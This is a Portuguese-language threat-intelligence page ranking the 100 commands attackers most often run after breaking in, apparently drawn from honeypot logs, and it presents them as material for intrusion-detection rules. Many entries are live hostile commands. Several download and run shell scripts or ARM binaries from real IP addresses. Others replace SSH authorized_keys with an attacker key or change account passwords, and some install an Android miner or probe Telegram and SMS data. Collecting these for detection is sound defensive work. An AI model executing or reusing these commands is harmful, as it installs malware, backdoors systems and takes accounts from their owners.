TROYANOSYVIRUS
Atualizado: fevereiro de 2026

Top 100 Comandos Maliciosos

Os comandos mais executados por atacantes apos obter acesso ao sistema. Util para deteccao de intrusoes e resposta a incidentes.

15.940 comandos em 24h
1.
$Enter new UNIX password:
455 IPs1265x
2.
$lockr -ia .ssh
534 IPs867x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
476 IPs717x
4.
$uname -a
457 IPs701x
5.
$cat /proc/cpuinfo | grep name | wc -l
462 IPs688x
6.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
462 IPs686x
7.
$uname -m
450 IPs676x
8.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
459 IPs674x
9.
$uname
450 IPs672x
10.
$crontab -l
446 IPs669x
11.
$whoami
449 IPs669x
12.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
452 IPs668x
13.
$cat /proc/cpuinfo | grep model | grep name | wc -l
437 IPs655x
14.
$top
439 IPs652x
15.
$lscpu | grep Model
429 IPs648x
16.
$w
438 IPs647x
17.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
439 IPs635x
18.
$which ls
435 IPs632x
19.
$ls -lh $(which ls)
408 IPs568x
20.
$uname -s -v -n -m 2 > /dev/null
109 IPs339x
21.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
101 IPs300x
22.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
38 IPs184x
23.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
131 IPs135x
24.
$uname -m 2 > /dev/null
38 IPs95x
25.
$/bin/./uname -s -v -n -r -m
16 IPs49x
26.
$uname -s -v -n -r -m
14 IPs30x
27.
$then
4 IPs11x
28.
$if [ [ ! -d ${HOME}/.ssh ] ]
4 IPs11x
29.
$nproc
4 IPs10x
30.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
2 IPs9x
31.
$pm path com.ufo.miner
4 IPs8x
32.
$echo SCANNER_TEST
7 IPs7x
33.
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -qO- http://139.59.119.89/ohshit.sh | sh; curl -s http://139.59.119.89/ohshit.sh | sh; wget http://139.59.119.89/ohshit.sh -O ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 139.59.119.89 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 139.59.119.89; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 139.59.119.89 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit2.sh
7 IPs7x
34.
$rm -rf /data/local/tmp/*
2 IPs6x
35.
$cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android
3 IPs5x
36.
$fi
2 IPs5x
37.
$cd /data/local/tmp 2>/dev/null||cd /tmp 2>/dev/null||cd /cache;rm -f kla.sh;(wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||busybox wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||curl -sLo kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||nc 45.148.120.23 3342 >kla.sh 2>/dev/null);[ -s kla.sh ]&&chmod +x kla.sh 2>/dev/null&&nohup sh kla.sh tbk >/dev/null 2>&1 &
2 IPs4x
38.
$Accept-Encoding: gzip
1 IPs4x
39.
$/ip cloud print
3 IPs4x
40.
$rm -f /data/local/tmp/ufo.apk
3 IPs4x
41.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs4x
42.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
4 IPs4x
43.
$ps | grep trinity
2 IPs4x
44.
$echo Hi | cat -n
4 IPs4x
45.
$/data/local/tmp/nohup /data/local/tmp/trinity
2 IPs3x
46.
$uname -s -m
3 IPs3x
47.
$chmod 0755 /data/local/tmp/nohup
2 IPs3x
48.
$chmod 0755 /data/local/tmp/trinity
2 IPs3x
49.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
2 IPs3x
50.
$locate D877F783D5D3EF8Cs
3 IPs3x
51.
$ifconfig
3 IPs3x
52.
$cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:34029/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:34029/arm7 -o arm7; chmod 777 arm7; ./arm7
2 IPs2x
53.
$cd /data/local/tmp/; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; busybox curl http://140.233.190.82/cat.sh; sh cat.sh
2 IPs2x
54.
$cd /data/local/tmp/; busybox wget http://130.12.180.124/rq0anbhkd976/assets/js/o5a0j5tug8?token=PeOtaCY5NmzmOSDVm0BX9UDM8lJijstK; chmod 777 o5a0j5tug8; ./o5a0j5tug8
1 IPs2x
55.
$system
1 IPs2x
56.
$cd /data/local/tmp && busybox wget http://130.12.180.20:36695/dlr.arm7 -O arm7 2>/dev/null || curl -s http://130.12.180.20:36695/dlr.arm7 -o arm7 2>/dev/null && chmod 777 arm7 2>/dev/null && ./arm7; chmod 777 dvrHelper;./dvrHelper route
1 IPs2x
57.
$wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/c.sh; sh c.sh; wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/download.sh; sh download.sh; busybox wget http://130.12.182.211:25196/download.sh; sh download.sh; busybox curl http://130.12.182.211:25196/download.sh; sh download.sh
2 IPs2x
58.
$Accept: */*
1 IPs2x
59.
$cat /proc/cpuinfo
2 IPs2x
60.
$shell
1 IPs2x
61.
$q
1 IPs2x
62.
$ps | grep xig
1 IPs2x
63.
$ps -ef | grep '[Mm]iner'
2 IPs2x
64.
$pm install /data/local/tmp/ufo.apk
1 IPs2x
65.
$ps aux | head -10
2 IPs2x
66.
$ps | grep '[Mm]iner'
2 IPs2x
67.
$Connection: keep-alive
1 IPs2x
68.
$echo -e "Hadoop\nhFRCroxssY1h\nhFRCroxssY1h"|passwd|bash
1 IPs2x
69.
$echo -e "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50"|passwd|bash
1 IPs2x
70.
$echo "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50\n"|passwd
1 IPs2x
71.
$echo "root:jL1LzwxX7JxA"|chpasswd|bash
2 IPs2x
72.
$Accept-Encoding: gzip, deflate
1 IPs2x
73.
$echo "123321\nRUpeh9tuqw3v\nRUpeh9tuqw3v\n"|passwd
1 IPs1x
74.
$echo "123321\nKN51pmeeHHUv\nKN51pmeeHHUv\n"|passwd
1 IPs1x
75.
$echo "123321\nDjHRSyQ1EPdO\nDjHRSyQ1EPdO\n"|passwd
1 IPs1x
76.
$echo "123321\n4SI1mMl74HlR\n4SI1mMl74HlR\n"|passwd
1 IPs1x
77.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "SP2NOvnB\nSP2NOvnB" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
78.
$echo "123123\nP1OUW6T29tS6\nP1OUW6T29tS6\n"|passwd
1 IPs1x
79.
$echo "123123123\nwFvHhFrIHxtg\nwFvHhFrIHxtg\n"|passwd
1 IPs1x
80.
$echo "123123123\nmXEz2gAp8d4V\nmXEz2gAp8d4V\n"|passwd
1 IPs1x
81.
$echo "123!@#$\nfZ1nfmnNzyUW\nfZ1nfmnNzyUW\n"|passwd
1 IPs1x
82.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "L435vfVF\nL435vfVF" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
83.
$echo "123!@#$\nEzP2gX7rk5b5\nEzP2gX7rk5b5\n"|passwd
1 IPs1x
84.
$echo "121212\nhUxxa3cXY2Mb\nhUxxa3cXY2Mb\n"|passwd
1 IPs1x
85.
$echo "121212\nfJsQEZM40Eca\nfJsQEZM40Eca\n"|passwd
1 IPs1x
86.
$echo "121212\n0MlnpYmDAiQb\n0MlnpYmDAiQb\n"|passwd
1 IPs1x
87.
$echo "111\nWyca6qXhOXbT\nWyca6qXhOXbT\n"|passwd
1 IPs1x
88.
$echo "123456\nvgHLHDPXKlOk\nvgHLHDPXKlOk\n"|passwd
1 IPs1x
89.
$echo "111\n3ynuIbVmzNZc\n3ynuIbVmzNZc\n"|passwd
1 IPs1x
90.
$echo "123456\noxtqEhEFdMOn\noxtqEhEFdMOn\n"|passwd
1 IPs1x
91.
$echo "123456\ngnmXRaT5TcSS\ngnmXRaT5TcSS\n"|passwd
1 IPs1x
92.
$echo "111111\nBlcbyJCuNf89\nBlcbyJCuNf89\n"|passwd
1 IPs1x
93.
$echo "111111\n89Oo92DtFfPG\n89Oo92DtFfPG\n"|passwd
1 IPs1x
94.
$cat /proc/mounts; /bin/busybox WYJYX
1 IPs1x
95.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "GhheRrmj\nGhheRrmj" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
96.
$echo "123456\nhNPj5SOwsnGE\nhNPj5SOwsnGE\n"|passwd
1 IPs1x
97.
$echo "123456\nfQRbK99JMwea\nfQRbK99JMwea\n"|passwd
1 IPs1x
98.
$echo "123456\nuD0td0mfcHbY\nuD0td0mfcHbY\n"|passwd
1 IPs1x
99.
$echo "123456\ndLTxtqoO7B3l\ndLTxtqoO7B3l\n"|passwd
1 IPs1x
100.
$echo "123456\nc14JQyxbxSnu\nc14JQyxbxSnu\n"|passwd
1 IPs1x

Reconhecimento

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistencia

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Deteccao

Estes comandos podem ser usados para criar regras de deteccao em SIEM, IDS/IPS e sistemas de monitoramento. Monitore estes padroes em seus logs para detectar intrusoes.